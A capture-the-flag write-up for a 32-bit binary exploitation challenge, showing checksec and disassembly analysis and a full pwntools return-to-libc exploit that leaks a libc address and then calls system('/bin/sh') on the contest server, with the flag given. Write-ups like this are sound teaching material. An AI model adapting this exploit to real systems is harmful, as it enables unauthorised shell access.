SCSC2026 Quals - MultiParam32 - Binary Exploitation Writeup

414 words

2 minutes

SCSC2026 Quals - MultiParam32 - Binary Exploitation Writeup

2026-02-17

Writeup

CTF

/

Security

/

Binary Exploitation

Category: Binary Exploitation

Server: nc 43.128.69.211 13003

Flag: scsc26{uN3Xp3ctEd_mUlT1_p4r4m}

Challenge Description#

32-bit binary exploitation challenge requiring return-to-libc attack.

Binary Analysis#

1
$ file multiparam
2
multiparam: ELF 32-bit LSB executable, Intel 80386, dynamically linked
3

4
$ checksec --file=multiparam
5
    Arch:     i386-32-little
6
    RELRO:    Partial RELRO
7
    Stack:    No canary found
8
    NX:       NX enabled
9
    PIE:      No PIE

Disassembly Analysis (main function)#

1
; Stack layout:
2
; ebp-0x14: buffer (20 bytes from ebp)
3
; ebp-0x8:  var2 (loaded into eax if check passes)
4
; ebp-0x4:  var1 (must equal 0xd34dc4fe)
5
; ebp:      saved ebp
6
; ebp+0x4:  return address
7

8
mov    DWORD PTR [ebp-0x4], 0x0      ; var1 = 0
9
lea    eax, [ebp-0x14]               ; buffer address
10
push   eax
11
call   gets                          ; VULNERABLE: gets(buffer)
12
mov    eax, DWORD PTR [ebp-0x4]
13
cmp    eax, 0xd34dc4fe               ; check if var1 == magic
14
jne    skip
15
mov    eax, DWORD PTR [ebp-0x8]      ; load var2 into eax
16
skip:
17
push   0x804a008                     ; "Try again?"
18
call   puts
19
leave
20
ret

Vulnerability#

gets() has no bounds checking - classic buffer overflow
No win function exists - need ret2libc
NX enabled - can’t execute shellcode on stack

Exploitation Strategy#

Stage 1: Leak libc address

Overflow buffer to control return address
Return to puts@plt with puts@GOT as argument
This prints the runtime address of puts in libc
Return to main to continue exploitation

Stage 2: Calculate libc addresses

Use leaked puts address to identify libc version
Calculate system() and /bin/sh addresses

Stage 3: Get shell

Overflow again with system("/bin/sh") ROP chain

Identifying Libc Version#

Leaked addresses:

puts@libc ending in 0x140
gets@libc ending in 0x660

Using libc.rip database:

1
libc6_2.39-0ubuntu8.4_i386:
2
  puts:       0x78140
3
  gets:       0x77660
4
  system:     0x50430
5
  str_bin_sh: 0x1c4de8

Final Exploit#

1
# !/usr/bin/env python3
2
from pwn import *
3

4
context.arch = 'i386'
5

6
HOST = '43.128.69.211'
7
PORT = 13003
8

9
# Binary addresses (no PIE)
10
PUTS_PLT = 0x8049040
11
PUTS_GOT = 0x804c010
12
MAIN_ADDR = 0x8049182
13
MAGIC = 0xd34dc4fe
14

15
# libc6_2.39 i386 offsets
16
PUTS_OFF = 0x78140
17
SYSTEM_OFF = 0x50430
18
BINSH_OFF = 0x1c4de8
19

20
p = remote(HOST, PORT)
21

22
# ============ STAGE 1: Leak libc ============
23
# Stack: [12 bytes padding][var2][var1=MAGIC][saved_ebp][ret_addr][ret_after][arg]
24
padding = b'A' * 12
25
payload1 = padding + p32(0xdeadbeef) + p32(MAGIC) + p32(0x42424242)
26
payload1 += p32(PUTS_PLT)   # ret to puts@plt
27
payload1 += p32(MAIN_ADDR)  # return to main after puts
28
payload1 += p32(PUTS_GOT)   # argument: puts@GOT
29

30
p.sendline(payload1)
31
p.recvuntil(b'Try again?\n')
32

33
# Read leaked address
34
puts_libc = u32(p.recv(4))
35
log.success(f"Leaked puts@libc: {hex(puts_libc)}")
36

37
# ============ STAGE 2: Calculate addresses ============
38
libc_base = puts_libc - PUTS_OFF
39
system_addr = libc_base + SYSTEM_OFF
40
binsh_addr = libc_base + BINSH_OFF
41

42
log.info(f"libc base: {hex(libc_base)}")
43
log.info(f"system: {hex(system_addr)}")
44
log.info(f"/bin/sh: {hex(binsh_addr)}")
45

46
# Clean buffer
47
sleep(0.2)
48
try: p.recv(timeout=0.3)
49
except: pass
50

51
# ============ STAGE 3: system("/bin/sh") ============
52
payload2 = padding + p32(0xdeadbeef) + p32(MAGIC) + p32(0x42424242)
53
payload2 += p32(system_addr)   # ret to system
54
payload2 += p32(MAIN_ADDR)     # return after system
55
payload2 += p32(binsh_addr)    # argument: "/bin/sh"
56

57
p.sendline(payload2)
58
p.interactive()